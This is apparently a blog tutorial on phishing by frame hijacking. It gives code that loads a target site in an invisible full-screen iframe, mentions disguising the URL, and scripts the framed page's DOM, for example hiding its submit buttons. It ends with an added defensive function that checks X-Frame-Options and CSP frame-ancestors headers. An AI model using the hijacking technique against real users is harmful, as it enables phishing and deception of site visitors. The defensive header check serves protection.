Javascript: Frame Hijacking Phishing
Oct 27




This hack is often used for frame hijacking/phishing techniques. Imagine there's a webpage (not yours) on which you cannot run code. For example, in Salesforce there are pages on which you cannot implement your own code.
I found a way to manipulate other people's pages, and it's so damn mean. (gnehgnehgneh).
Before showing you any code, I will tell you the basics of this idea:
1. Let the user go to a different URL than the one they want.
2. This page contains only an iframe of the requested page that the user wants to see.
The iframe loads at 100%, so the user won't see a difference. (And of course you can also disguise the URL in the address bar so the user cannot read it either.)
3. Besides the iframe, this fake page also contains code. With this code you control the code within the iframe. (Yes you can, it's all about DOM scripting baby!)
All right, show me the money!
First you'll have to add the secret iframe to your HTML. This is no rocket science: just make sure you give the iframe an ID, so you can reference it later on, and an onload JavaScript function. It's also much nicer if you give it 100% width and height, scrolling 1, and frameborder and margin 0, so the iframe itself is almost invisible.
<iframe id="theLoadedPage"
        src="http://www.blankURL.com"
        onload="hjackFrames('theLoadedPage')" name="theLoadedPage" width="100%"
        height="100%" scrolling="1" frameborder="0" marginwidth="0"
        marginheight="0">
    <p>Loading...</p>
</iframe>
If you are a perfectionist like me, add some extra CSS styles to make it even nicer and let the iframe take over the original screen.
html {
    overflow: hidden;
}
html, body {
    width: 100%;
    height: 100%;
    margin: 0px;
    padding: 0px;
}
iframe {
    /* "overflow: hidden-x" is not valid CSS; the horizontal axis has its own property */
    overflow-x: hidden;
}
Now start writing the code trick.
First you'll need a main function, which requests the page in the iframe at 100%.
function main() {
    var loadPageSrc = document.getElementById("theLoadedPage");
    loadPageSrc.setAttribute("src", "http://www.newLoadedPage.com");
}
Now here's the hack. I built it in a try/catch block to handle errors.
function hjackFrames(id) {
    try {
        var frame = document.getElementById(id);
        var inside;
        if (frame.tagName != 'IFRAME') {
            return;
        }
        /* Reaching into the frame's document only succeeds when the framed page is
           same-origin with this page; otherwise the browser throws and we land in catch. */
        inside = window.frames[id].document.getElementsByTagName('BODY')[0];
        /* this part is not part of the hack, but from here you can manipulate the page,
           for example; hide all submit buttons. */
        var allInputs = [];
        allInputs = inside.getElementsByTagName('INPUT');
        for (var i = 0; i < allInputs.length; i++) {
            if (allInputs[i].type == "submit") {
                allInputs[i].style.display = "none";
            }
        }
    } catch (err) {
        /* do other nice things, here since the hack is failing */
    }
}
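The whole trick depends on the target page agreeing to be rendered inside someone else's frame, which the site owner controls with the X-Frame-Options and Content-Security-Policy frame-ancestors response headers. The following is an added example, not code from the original post: it evaluates those two headers for a given parent origin, and the function names, origins and header values in it are constructed for illustration.

```javascript
// Added example, not from the original post: would a browser render a page
// inside a frame whose parent document is on parentOrigin? Simplified to the
// direct parent (not every ancestor) and to http/https origins.
function parseFrameAncestors(csp) {
  for (const directive of (csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") return sources;
  }
  return null; // directive absent
}

function sourceMatches(source, parentOrigin, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return parentOrigin === pageOrigin;
  if (s === "*") return true;
  const parent = new URL(parentOrigin);
  const upgrade = (want) => parent.protocol === want || (want === "http:" && parent.protocol === "https:");
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return upgrade(s); // scheme source such as https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  // A source without a scheme inherits the framed page's scheme.
  if (!upgrade(scheme ? scheme + ":" : new URL(pageOrigin).protocol)) return false;
  // A source without a port matches only the scheme's default port.
  const parentPort = parent.port || (parent.protocol === "https:" ? "443" : "80");
  if (port === undefined ? parent.port !== "" : port !== "*" && port !== parentPort) return false;
  // "*.example.com" matches subdomains only, not example.com itself.
  return wildcard ? parent.hostname.endsWith("." + host) : parent.hostname === host;
}

function canBeFramed(headers, parentOrigin, pageOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const ancestors = parseFrameAncestors(h["content-security-policy"]);
  if (ancestors !== null) {
    // frame-ancestors, when present, is enforced instead of X-Frame-Options.
    return ancestors.some((s) => sourceMatches(s, parentOrigin, pageOrigin));
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return parentOrigin === pageOrigin;
  return true; // no framing restriction was sent
}

// Constructed sample: headers for a page that only its own origin may frame.
const sample = { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" };
console.log(canBeFramed(sample, "https://portal.example", "https://app.example")); // false
```

A page that sends neither header returns true here, which is the condition the framing page above relies on.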